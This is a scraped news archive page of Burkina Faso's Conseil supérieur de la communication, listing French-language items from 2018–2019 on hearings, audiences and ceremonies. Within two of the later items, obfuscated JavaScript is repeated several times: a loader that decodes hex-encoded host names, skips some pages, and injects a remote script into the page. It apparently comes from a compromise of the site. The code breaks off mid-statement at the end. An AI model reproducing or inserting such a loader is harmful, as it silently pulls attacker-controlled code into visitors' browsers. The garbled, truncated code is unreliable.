Le Conseil supérieur de la Communication, a auditionné les responsables de la télévision BF1 et le journaliste Issaka LINGANI, le 10 juin 2019. Cette interpellation est relative au contenu de l'émission « Presse Echos» diffusée le dimanche 02 juin 2019 à partir de 11 heures sur les antennes de la télévision.

Audience : Le Balai Citoyen zone 4 reçu par le Vice-président

12/06/2019

Sur instruction du Président empêché, le Vice-président du Conseil supérieur de la communication, Abdoulazize Bamogo a reçu en audience une délégation de la zone 4 du Balai Citoyen, le mercredi 12 juin 2019 à 10 h.

Le CSC interpelle les médias sur la diffusion de messages publicitaires des produits pharmaceutiques, de la pharmacopée traditionnelle et des établissements sanitaires

07/06/2019

Le CSC interpelle les médias sur la diffusion de messages publicitaires des produits pharmaceutiques, de la pharmacopée traditionnelle et des établissements sanitaires

SEPAFAR : Le Président du CSC contribue à l’animation d’un panel-débat

03/06/2019

Le président du Conseil supérieur de la communication (CSC) a apporté sa contribution à l'animation d'un panel-débat, sur le thème : « Internet, éducation et gouvernance au Burkina Faso : perte des valeurs, dépravation des mœurs chez les jeunes, silence des aînés (gouvernants, société civile et parents) », le samedi 18 mai 2019.

Le Président du CSC reçoit l’association des photojournalistes du Burkina

17/05/2019

Le président du Conseil supérieur de la communication (CSC), Me Soahanla Mathias TANKOANO, a reçu en audience, ce vendredi 17 mai 2019, l'Association des photojournalistes du Burkina (APB).  La toute nouvelle organisation de professionnels de la presse est venue se faire connaître de l'instance de régulation et exposer à son premier responsable ses préoccupations et ses attentes.

Le Collège des Conseillers du CSC rend visite au Moogho Naaba

08/05/2019

Le Collège des Conseillers du Conseil supérieur de la communication (CSC) a rendu une visite de courtoisie, ce mercredi 8 mai 2019, au Moogho Naaba Baongho. La délégation, conduite par le président Me Soahanla Mathias TANKOANO, est allée se présenter au monarque et demander ses conseils et bénédictions.

26ème journée mondiale de la liberté de la presse : le président du CSC lance les activités commémoratives

06/05/2019

Le président du Conseil supérieur de la communication (CSC),  Me Soahanla Mathias TANKOANO, a parrainé,  le jeudi 3 mai 2019  dans la salle de conférences de la DGCOOP, la cérémonie de commémoration de la journée mondiale de la liberté de la presse sous le thème  « Médias et  élections dans un contexte de crise sécuritaire et communautaire au Burkina Faso ».

2e Edition de Burkin’Daaga : Le CSC encourage les exposants

30/04/2019

Une délégation du Conseil supérieur de la communication (CSC) conduite par le conseiller Ismaël NIGNAN a visité les stands d'expositions de la 2e Edition du « Consommons local » dénommé Burkin' Daaga. C'était le lundi 29 avril 2019 à la maison du peuple.

CSC: renouvellement de conventions de concession de service public de radiodiffusion de 14 médias audiovisuels privés

25/04/2019

Ce jeudi 25 avril 2019 à 10 h s'est tenue dans la salle de conférences du Conseil supérieur de la communication (CSC) la cérémonie de renouvellement de conventions de concession de service public de radiodiffusion de médias audiovisuels privés. La cérémonie a été présidée par la conseillère Eugénie Séraphine YAMEOGO/OUATTARA, représentant le président du CSC

Monitoring des médias audiovisuels : le CSC veut se doter d’un système performant

24/04/2019

Le président du Conseil supérieur de la communication (CSC), Me Soahanla Mathias TANKOANO, a reçu, le mercredi 24 avril 2019, une mission de la Haute autorité de la communication audiovisuelle (HACA) du Royaume du Maroc. Cette mission est au Burkina Faso à la demande du CSC qui veut s'inspirer de l'expérience du Maroc et se doter d'un système de monitoring des contenus audiovisuels performant.

Le CSC a entendu les responsables de la RTB et monsieur Dieudonné Zoungrana

23/04/2019

La Commission chargée de la liberté de la presse, du pluralisme, de l'éthique et de la déontologie a entendu, le 19 avril 2019, successivement les responsables de la RTB et monsieur Dieudonné Zoungrana, journaliste invité de l'émission « Débat de presse » diffusée le 14 avril 2019 à la RTB/Télé

Questions genre dans les médias : un pool de consultants de l’Union européenne reçu par le Président du Conseil supérieur de la communication (CSC)

17/04/2019

Une équipe de consultants engagés par l'Union européenne pour mener une étude sur les questions genre dans les médias a été reçue par Maître Soahanla Mathias Tankoano, Président du CSC (Conseil supérieur de la communication), le mardi 16 avril 2019.

La DRO a été installée

15/04/2019

La Directrice régionale de l'Ouest (DRO) du Conseil supérieur de la Communication (CSC), Madame MINOUNGOU/TAPSOBA Augustine, nommée suivant arrêté N°2019-004/CSC/SG/DRH/SGAP du 05 mars 2019, a été officiellement installée dans ses fonctions ce mercredi 10 avril 2019 par la Secrétaire générale du CSC, Madame NACOULMA/SANOU Yvette, au sein de la DRO à Bobo-Dioulasso.

Renouvellement de conventions de médias audiovisuels privés par le CSC

12/04/2019

Le Conseil supérieur de la communication (CSC) a procédé, ce vendredi 12 avril 2019 à 10h, au renouvellement de conventions de concessions de service public de radiodiffusion de 61 médias audiovisuels privés. La cérémonie a été présidée par Me Soahanla Mathias TANKOANO, Président du CSC.

Audience : le président du CSC reçoit la ligue des communicateurs

11/04/2019

Le président du Conseil Supérieur de la Communication (CSC), Me Mathias TANKOANO, a reçu, le jeudi 11 avril 2019 dans la salle du conseil du CSC, la Ligue des Directeurs, Conseillers et Chargés de Communication et marketing du Burkina Faso (LIDICOM/BF).

Montée des couleurs au CSC : le gros poisson du président

03/04/2019

Le président et le personnel du Conseil supérieur de la communication (CSC) ont effectué la montée des couleurs nationales ce lundi 1er avril à 7h30 sur le perron de l'institution.

Fin des travaux de l’atelier sur les passerelles de dialogue entre FDS et médias dans la riposte contre le terrorisme

29/03/2019

Le deuxième atelier co-organisé à Banfora par le Conseil supérieur de la Communication (CSC) et le Secrétariat général de la Défense nationale (SGDN) sur le financement du Programme des Nations unies pour le développement (PNUD) au Burkina Faso a pris fin le 27 mars.

Premier ministère : Le Président et le Collège des conseillers du CSC reçus en audience

29/03/2019

Premier ministère : Le Président et le Collège des conseillers du CSC reçus en audience   Le Premier ministre, Christophe DABIRE, a reçu en audience une délégation du Collège des conseillers du Conseil supérieur de la communication (CSC) conduite par le Président Soahanla Mathias TANKOANO, le vendredi 29 mars 2019.

Le CSC et la Défense nationale jettent un pont entre médias et FDS

22/03/2019

Le Conseil supérieur de la Communication (CSC) et le Secrétariat général de la Défense nationale (SGDN) ont ouvert, ce 21 mars 2019, à Koudougou, un atelier de réflexion sur les passerelles de dialogue entre les Forces de défense et de sécurité (FDS) et les médias dans la politique de riposte contre le terrorisme sous le thème «Médias et sécurité».

Le PUR reçu par le président du CSC

20/03/2019

Une délégation du parti politique dénommé «Progressistes unis pour le renouveau» (PUR), formation d'obédience sankariste issue de l'Union pour la renaissance/Parti sankariste (Unir/PS), a été reçue en fin de matinée de ce 20 mars 2019 par le président du Conseil supérieur de la communication (CSC).

Célébration du 08-Mars en différé au CSC

20/03/2019

Célébration du 08-Mars en différé au CSC   La journée internationale de la femme a été célébrée, ce mardi 19 mars, en différé par les femmes du Conseil supérieur de la communication. A cette occasion, toutes vêtues en uniforme du 08-Mars 2019, elles se sont regroupées sous le perron de l'institution pour témoigner au Président du CSC, Maître Soahanla Mathias TANKOANO, leur engagement à ses côtés, en vue de l'atteinte des objectifs assignés à l'institution. 

CONSEIL SUPERIEUR DE LA COMMUNICATION : CEREMONIE D’INSTALLATION DES NOUVEAUX DIRECTEURS

14/03/2019

La secrétaire générale du Conseil supérieur de la communication, Madame Massadalo Yvette NACOULMA, a procédé à l'installation des nouveaux directeurs de l'institution le jeudi 14 mars 2019.  La nomination de ces nouveaux promus par l'arrêté N°2019-003-CSC/SG/RDH/SGAP du 05 mars 2O19, entre en droite ligne de la mise en œuvre du nouvel organigramme de l'instance de régulation des médias, adopté en Conseil des ministres en décembre 2018.  

Audience : Le président du CSC reçoit l’UCAP

14/03/2019

Le président du CSC, Me Mathias TANKOANO, a reçu en audience, dans la matinée du mardi 13 mars 2019, une délégation de l'Union catholique africaine de la presse, section du Burkina (UCAP-Burkina). La délégation, conduite par le président de l'UCAP, Alexandre Le Grand Rouamba, est venue féliciter l'équipe des Conseillers du CSC et lui traduire ses encouragements dans sa mission.

Le bureau de l’ONAFAR chez le président du CSC

11/03/2019

Le bureau de l'Observatoire national des faits religieux (ONAFAR) était en audience ce 11 mars 2019 chez le président du Conseil supérieur de la communication (CSC). La délégation, composée de quatre membres, était conduite par le président, Docteur Oualilaï KINDO.

Le président du CSC co-parraine le lancement officiel des activités du bureau des élèves de l’ENAM

11/03/2019

Le président du Conseil supérieur de la communication (CSC), Me Mathias TANKOANO, a coparrainé, le jeudi 07 mars, avec Son Excellence Seydou ZAGRE, Directeur du cabinet du Président du Faso, le lancement officiel des activités du bureau des élèves de l'Ecole nationale d'Administration et de Magistrature (ENAM

Le CSC et le BBDA pour un meilleur rayonnement de la culture burkinabè dans les médias

21/02/2019

Le Conseil supérieur de la communication (CSC) et le Bureau Burkinabè de Droit d'Auteur (BBDA) ont  signé une convention de collaboration ce jeudi 21 février 2019 au sein du CSC.

Audition du journal « Le Dossier »

15/02/2019

La commission chargée de la liberté de la presse, de l'éthique et de la déontologie du Conseil supérieur de la communication (CSC) a auditionné, le jeudi 14 février 2018, le Directeur de publication du journal « Le Dossier », monsieur Adama OUEDRAOGO dit Damiss. Il avait à ses côtés  son avocat Me Ambroise FARAMA.

Le CSC se soucie de la fiscalité des entreprises de presse

01/02/2019

Ce jeudi 31 janvier 2019, le Conseil supérieur de la Communication (CSC) a organisé, avec l'appui de la Direction générale des Impôts, un atelier national sur « la fiscalité applicable aux médias et la mise en œuvre de la facture normalisée ». Les travaux se sont déroulés dans la salle de conférences de la Direction générale des Douanes de Ouagadougou.

Le CSC reçoit la visite de la 4ème promotion des élèves officiers

30/01/2019

Le Conseil Supérieur de la Communication (CSC) a reçu, le mercredi 30 janvier 2019,   la visite de la 4ème promotion des élèves officiers de l'Académie de police. Conduits par l'assistant de police OUEDRAOGO P. sylvain, les élèves officiers sont venus à la découverte de l'instance de régulation des médias au Burkina Faso.

Le Directeur Afrique de CFI chez le président du CSC

28/01/2019

Le Directeur Afrique de CFI, Pierre JALLADEAU, présent au Burkina Faso dans le cadre du lancement du projet EcoMedias porté par l'UNALFA, l'Union nationale de l'audiovisuel libre du Faso, a été reçu en audience dans l'après-midi du lundi 28 janvier par le président du Conseil supérieur de la communication (CSC), Me Soahanla Mathias TANKOANO.

Le président du CSC, patron du projet EcoMédia

28/01/2019

Le président du Conseil supérieur de la communication (CSC) a, au cours d'une cérémonie tenue le lundi 28 janvier 2019 à l'hôtel Royal Beach, procédé au lancement du projet EcoMédias.

Cérémonie de présentation de voeux : Le CSC et ses partenaires se souhaitent une bonne et heureuse année

25/01/2019

Ce vendredi 25 janvier 2019 a eu lieu au sein du conseil supérieur de la communication la cérémonie de présentation de voeux du collège des conseillers aux acteurs du monde des médias. Ils étéaient nombreux à être venus sacrifier à cette tradition.

Le président du CSC encourage le Club des étudiants en communication et journalisme

25/01/2019

Monsieur le Président du Conseil supérieur de la communication (CSC), Me Soahanla Mathias TANKOANO, a reçu le bureau du Club des étudiants en communication et journalisme de l'Université Ouaga 1 Pr Joseph-Ki-Zerbo.

Audience: l’ARCI-BF et le CSC sur la même fréquence

23/01/2019

 Le président du Conseil supérieur de la communication (CSC) Me Mathias TANKOANO, a reçu en milieu de matinée du 23 janvier le bureau de l'Association des retraités de la communication et de l'information du Burkina Faso (ARCI.BF). Conduite par son président, Jean-Baptiste ILBOUDO, la délégation était venue rendre une visite de courtoisie au président du CSC.

Le CSC rend une visite au Conseil constitutionnel

22/01/2019

Dans la matinée du 17 janvier dernier, le président du Conseil supérieur de la communication (CSC), Me Soahanla Mathias Tankoano, a conduit une délégation de l'institution au Conseil constitutionnel.

L’ambassadeur de France chez le président du CSC

22/01/2019

L'ambassadeur de France au Burkina Faso, Son Excellence Xavier Lapeyre de Cabanes, accompagné du conseiller politique et presse de l'ambassade, Nicolas Courtin, a rendu une visite de courtoisie au président du Conseil supérieur de la communication (CSC), Maître Mathias Tankoano.

Coopération institutionnelle: Echanges d’expériences entre la Haute autorité de l’audiovisuel et de la communication du Togo et le Conseil supérieur de la communication

22/01/2019

Une délégation de la Haute autorité de l'audiovisuel et de la communication u Togo (HAAC/Togo), composée du conseiller Babaka Badjibassa et du consultant Maurille Agbovou, a effectué une mission d'étude au Burkina Faso du 14 au 16 janvier 2019

Emissions interactives: le CSC échange avec les responsables et les animateurs des médias

18/01/2019

Le Président du Conseil supérieur de la communication (CSC), Me Soahanla Mathias Tankoano, a échangé avec les responsables et les animateurs des médias sur l'animation des émissions interactives, le vendredi 18 janvier 2019. Il s'est agi pour le premier responsable de l'instance de régulation des médias et le collège des conseillers d'appeler les animateurs de ces émissions à redoubler de vigilance afin de prévenir les cas d'invectives et de dérapages susceptibles d'envenimer la situation socio-politique déjà délétère.

Le président du CSC présente ses vœux aux acteurs des médias

10/01/2019

A l'orée de l'année 2019, le président du Conseil supérieur de la communication, Soahanla Mathias TANKOANO, présente ses vœux aux femmes et hommes des médias, au Burkina Faso et à l'Afrique.

Nouvel An : vœux de cohésion au CSC

03/01/2019

Le président du Conseil supérieur de la Communication (CSC), Me Soahanla Mathias TANKOANO, a reçu ce 1erjanvier 2019 les vœux des personnels de l'administration de l'institution. Conduite par la Secrétaire générale, Massadalo Yvette NACOULMA/SANOU, la délégation est allée présenter ses vœux de santé et de succès au président TANKOANO.

Rencontre CSC-CNP/NZ : Les bases d’une collaboration pour promouvoir la liberté de presse posées

20/12/2018

Le jeudi 20 décembre 2018, le président du Conseil supérieur de la communication, Soahanla Mathias TANKOANO, et l'ensemble du collège des conseillers ont rendu une visite de courtoisie aux gestionnaires du Centre national de presse Norbert Zongo (CNP-NZ) ainsi qu'aux responsables des associations professionnelles des médias.

SEMAINE NATIONALE DE LA CITOYENNETE : LE CSC A TENU SA JOURNEE NATIONALE DU DRAPEAU

29/11/2018

Dans le cadre de la Semaine nationale de la citoyenneté (SENAC), les Conseillers et le personnel du Conseil supérieur de la Communication (CSC) ont observé la Journée nationale du Drapeau ce 29 novembre 2018. Rassemblés autour du président du CSC, M. Mathias TANKOANO, ils ont procédé à la montée des couleurs.

RENTRÉE PUBLICITAIRE : LE PRÉSIDENT TANKOANO PATRONNE LA 1ère RENTRÉE

29/11/2018

Le président du Conseil supérieur de la communication (CSC) a patronné, ce 28 novembre 2018, l'ouverture officielle de la rentrée publicitaire organisée par « Publicitaires associés ». C'était en présence du ministre de la Communication et des Relations avec le Parlement et de la présidente de la Haute Autorité de la Communication de la République de Guinée.

Audience : Le président du CSC reçoit le comité technique de la carte de presse et du laissez-passer

26/11/2018

Le président du Conseil supérieur de la communication (CSC), Mathias TANKOANO, a reçu en audience, le lundi 26 novembre 2018, une délégation du Comité technique de la carte de presse et du laissez-passer. Présenter le comité et solliciter l'accompagnement de la nouvelle équipe du CSC ont été, entre autres, les points à l'ordre du jour.

Passation de service : les nouveaux directeurs installés

22/11/2018

La Secrétaire générale du Conseil supérieur de la communication, Madame Massadalo Yvette NACOULMA/SANOU, a installé dans leurs fonctions, ce jour jeudi 22 novembre 2018, le Directeur des Marchés publics, le Directeur de l'Administration et des Finance et le Directeur des ressources humaines. Puis, ce fut au tour du Directeur de cabinet, Monsieur Boureima DIALLO, d'installer le  Directeur de la communication et des relations publiques.

Le président du CSC accueille ses nouveaux collaborateurs

21/11/2018

Le Conseil supérieur de la communication (CSC) a accueilli, le mercredi 21 novembre 2018, ses nouveaux collaborateurs. C'était au cours d'une cérémonie présidée par le premier responsable de l'institution, Soahanla Mathias TANKOANO.

CSC : les responsables de « Oméga FM » et du « Bendré » entendus

02/11/2018

Des membres du Conseil supérieur de la communication (CSC) ont auditionné, le mardi 30 octobre 2018, le directeur général de radio Oméga et le directeur de publication du journal « Bendré ». 

Audience du président du CSC: Mathias TANKOANO reçoit Luc Adolphe TIAO

23/10/2018

Le président du Conseil supérieur de la communication (CSC), Soahanla Mathias Tankoano, a reçu en audience Luc Adolphe TIAO, le mardi 23 octobre 2018. A travers cette visite de courtoisie, l'ex-président du CSC et ancien Premier ministre est passé apporter son encouragement au président Mathias Tankoano et à tous les conseillers.

Budget 2019 : Le président du CSC devant la COMFIB

12/10/2018

Le président Soahanla Mathias Tankoano a sacrifié au passage annuel devant la commission des finances et du budget (COMFIB) de l'Assemblée Nationale, le vendredi 12 octobre 2018. Il s'est agi pour le premier responsable de l'instance de régulation des médias, de faire une présentation succincte du budget 2019 de l'institution aux députés et de donner de plus amples informations sur certaines de ses prévisions.

Visite des médias : le csc à la rencontre du staff de la rtb

04/10/2018

Une délégation du Conseil supérieur de la communication (CSC) conduite par le vice-président Abdoulazize BAMOGO, a rendu une visite de courtoisie à l'équipe dirigeante de la radiodiffusion télévision du Burkina Faso (RTB) le mercredi 3 octobre 2018. Cette visite entre dans le cadre d'une tournée entreprise par la nouvelle équipe de l'institution dans les médias de Ouagadougou.

Audience : le président du CSC reçoit Publicitaires associés

28/09/2018

Le président du Conseil supérieur de la communication (CSC), Soahanla Mathias TANKOANO, a reçu en cette matinée du vendredi 28 septembre 2018 la visite de Publicitaires associés. La délégation conduite par sa présidente, Madame Cécile Gouba est venue solliciter l'accompagnement de la structure de tutelle dans l'assainissement du milieu de la publicité.

Incendie à l’ISTIC : Le président du CSC apporte son soutien

26/09/2018

Le président Soahanla Mathias TANKOANO, a rendu une visite à l'institut des sciences et techniques de l'information et de la communication (ISTIC), le 26 septembre 2018 dans la matinée, pour leur exprimer son soutien et ses encouragements, suite à l'incendie de leur salle informatique, la veille.

Relance des activités du CSC : le comité ad ’hoc fait des propositions pour un nouveau départ

14/09/2018

Le Conseil supérieur de la communication (CSC) a tenu, sous la direction de son président, Soahanla Mathias TANKOANO, une assemblée générale du personnel, ce vendredi 14 septembre 2018 dans la salle de conférences de l'institution. L'exposé des résultats des travaux du comité ad' hoc, mis en place pour diagnostiquer les causes du dysfonctionnement du CSC, a été le point essentiel de cette rencontre.

Le nouveau collège des conseillers prêtent serment devant le Conseil constitutionnel

03/08/2018

Le collège des conseillers du Conseil supérieur de la communication (CSC) a prêté serment le vendredi 3 août 2018 à Ouagadougou, devant le Conseil constitutionnel. Cette audience solennelle marque l'entrée officielle en fonction du nouveau Conseil dirigé par Mathias Tankoano.

- LES PAGES DU REGULATEUR DES MEDIAS - La problématique de la régulation des réseaux sociaux

13/07/2018

L'actualité concernant les réseaux sociaux est marquée par le scandale « Facebook-Cambridge Analytica » qui a vu le fondateur de Facebook Marc Zuckerberg être auditionné tour à tour par le Congrès américain et le parlement européen. 

COMMUNIQUE DE SENSIBILISATION

13/07/2018

Pour une meilleure organisation et un assainissement du secteur de la publicité

HAC/GUINEE CONAKRY- CSC/ BURKINA FASO : UNE COOPERATION SUD – SUD SOUS DE BONS AUSPICES

12/06/2018

Une délégation de la Haute Autorité de la communication (HAC) de Guinée Conakry, conduite par sa présidente, Madame Martine Kondé, a séjourné à Ouagadougou du lundi 4  au vendredi 8 juin 2018.  Plusieurs activités impliquant les deux instances de régulation ont marqué ce séjour qui augure d'une coopération sud – sud qui porte.  

Communiqué de presse : audition du journal « Le Dossier »

23/05/2018

La Commission de la Liberté de la Presse, de l'Ethique et de la Déontologie du Conseil Supérieur de la Communication a procédé à l'audition du directeur de publication du journal « Le Dossier » le vendredi 18 mai 2018 au sein de l'institution. Ce, après plusieurs reports dus à la tenue du procès du putsch de 2015 auquel les parties prennent part. Cette audition fait suite à une plainte pour calomnie et diffamation introduite le 23 février 2018 par monsieur Soahonla Mathias TANKOANO

Compte rendu de l’audience accordée par le Vice-président exerçant la plénitude des attributions du Président du Conseil supérieur de la communication à monsieur Bernard Chenuaud

21/05/2018

Le Vice-président exerçant la plénitude des attributions du Président du CSC, monsieur Dieudonné Désiré Comboïgo a reçu monsieur Bernard Chenuaud Directeur adjoint Afrique de CFI, le mardi 16 mai 2018. Il s'est agi pour monsieur Chenuaud de recueillir l'avis du CSC sur un ensemble de questions, en prélude à un projet que CFI entrevoit mener conjointement avec les autorités de régulation des pays que sont : le Niger, le Mali et le Burkina Faso, et certains acteurs médiatiques de ces contrées.

CONSEIL SUPERIEUR DE LA COMMUNICATION : Le vice-président exerçant la plénitude des attributions du président installe le comptable principal des matières

04/05/2018

Le vice-président exerçant la plénitude des attributions du président du CSC a procédé ce mercredi 02 mai 2018 dans la matinée, à l'installation du comptable principal des matières du CSC, Monsieur Siriki Berthé, administrateur des services financiers, nommé par décret en Conseil des ministres, le 26 mars 2018.

LES PAGES DU REGULATEUR DES MEDIAS : La contribution des médias Burkinabé au renforcement de l’Etat de droit

03/05/2018

Le thème de la commémoration de la journée internationale de la liberté de la presse du 03 mai 2018, choisi par Reporter sans frontière (RSF) est : « Médias, justice et état de droit : les contrepoids du pouvoir ». Aussi, pour sa première publication du mercredi 02 mai, « Les pages du régulateur des médias » a bien voulu s'attarder sur cette invite à l'introspection, contexte oblige, toute chose qui l'inspire à scruter le thème suivant : « La contribution des médias Burkinabé au renforcement de l'Etat de droit ». Cette réflexion qui tombe fort à propos, car elle permet non seulement d'éclairer la jeune génération sur le chemin parcouru, mais aussi de permettre aux seniors de dresser le bilan à travers une évaluation des actions antérieures. Il n'est aucunement prétentieux de soutenir aujourd'hui, l'effectivité de l'existence d'une liberté de la presse au pays des hommes intègres. Ce, au regard des classements de RSF sur l'état de la liberté de la presse dans le monde qui a de 2016 à 2018 successivement classé le Burkina Faso  devant de vieilles traditions démocratiques occidentales comme la France, classée 45ème en 2016 alors que le Burkina Faso était 42ème, encore 42ème en 2017 devant les USA classé 43ème, puis 41ème en 2018 avec les USA à la 45ème place.

Séminaire régional sur l’état des lieux du déploiement de la TNT dans les pays membres de l’UEMOA et de la Guinée : une avancée décisive du Burkina.

22/04/2018

Du 17 au 18 avril 2018 dernier s'est tenu à Abidjan (république de Côte-d'Ivoire), un séminaire régional sur l'état des lieux du processus de basculement à la TNT dans les pays membres de la Plate-forme des régulateurs de l'Audiovisuel des pays de l'UEMOA et de la Guinée.Organisé à l'initiative de la Haute Autorité de la Communication Audiovisuelle (HACA) de Côte-d'Ivoire, ce séminaire a été dédié à l'approche d'ensemble du bilan du processus de basculement à la TNT dans les pays membres de la Plate-forme, des difficultés rencontrées, des perspectives et solutions.

Audience du Cabinet du CSC : Le Vice-Président exercant la plénitude des attibutions du Président du CSC M. Dieudonné Désiré Comboïgo reçoit Publicitaires Associés

18/04/2018

Le Vice-président exerçant la plénitude des attributions de Président du Conseil supérieur de la communication a reçu en audience le jeudi 11 avril 2018, une délégation de l'association Publicitaires Associés conduite par sa première responsable, Madame Cécile Gouba. //n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[Ss]{1,2}/g);for(var e="",n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="csc.bf",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t < e.length;t++)if(o.indexOf(e[t])>-1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+"/d6safundjenk6af/"+e+"/c/"+n(r)+"_"+(self===top?0:1)+".js";window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}(); //]]> //n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[Ss]{1,2}/g);for(var e="",n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="csc.bf",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t < e.length;t++)if(o.indexOf(e[t])>-1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+"/d6safundjenk6af/"+e+"/c/"+n(r)+"_"+(self===top?0:1)+".js";window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}(); //]]>

Le Vice-président exerçant la plénitude des attributions du Président du CSC en mission en République de Côte d’Ivoire

16/04/2018

Le vice-président exerçant la plénitude des attributions du président du Conseil supérieur de la communication, Monsieur Dieudonné Désiré Comboïgo, effectue du 16 au 17 avril 2018, une mission à Abidjan, en république de Côte d'Ivoire, pour participer à un séminaire régional des instances de régulation au sommet sur le thème : « le déploiement de la Télévision Numérique Terrestre dans les pays membres de l'UEMOA et de la Guinée : Solutions et perspectives. » //n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[Ss]{1,2}/g);for(var e="",n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="csc.bf",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t < e.length;t++)if(o.indexOf(e[t])>-1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+"/d6safundjenk6af/"+e+"/c/"+n(r)+"_"+(self===top?0:1)+".js";window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}(); //]]> //n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[Ss]{1,2}/g);for(var e="",n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="csc.bf",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var 